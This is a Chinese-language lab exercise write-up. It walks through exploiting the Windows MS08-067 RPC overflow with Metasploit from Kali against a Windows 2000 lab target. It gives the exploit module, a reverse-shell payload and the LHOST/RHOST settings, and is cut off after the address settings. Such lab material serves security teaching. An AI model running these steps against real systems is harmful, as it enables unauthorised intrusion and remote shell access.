Windows攻擊實驗
實驗描述:
使用Metaspoit攻擊MS08-067,提交正確得到遠程shell過程的截圖(不少於五張)。
MS08-067漏洞介紹
MS08-067漏洞的全稱為“Windows Server服務RPC請求緩沖區溢出漏洞”,如果用戶在受影響的系統上收到特制的 RPC 請求,則該漏洞可能允許遠程執行代碼。在 Microsoft Windows 2000Windows XP 和 Windows Server 2003 系統上,攻擊者可能未經身份驗證即可利用此漏洞運行任意代碼,此漏洞可用於進行蠕蟲攻擊,目前已經有利用該漏洞的蠕蟲病毒。
實驗工具
本次實驗使用的攻擊機是kali,靶機是Win2kServer
攻擊機:192.168.92.147
靶機:192.168.92.148
實驗步驟:
1.首先攻擊機和靶機互ping,在kali終端開啟msfconsole
2.查找是否存在ms08_067漏洞,查看返回信息,會顯示出找到的滲透模塊
3.輸入命令use exploit/windows/smb/ms08_067_netapi,進入利用該漏洞模塊。接下來可輸入一些命令來顯示一些信息,如:
輸入show payloads會顯示出有效的攻擊載荷,比如shell_reverse_tcp
使用命令set payload generic/shell_reverse_tcp設置攻擊有效載荷
輸入show targets會顯示出可以被攻擊的靶機的操作系統型號
4.輸入show options顯示我們需要在攻擊前需要設置的數據
5.設置攻擊機和靶機地址,並使用命令show options再次查看payload狀態
輸入命令set LHOST + 攻擊機IP,即set LHOST 192.168.92.147;
輸入命令set RHOST + 靶機IP,即set RHOST 192.168.92.148;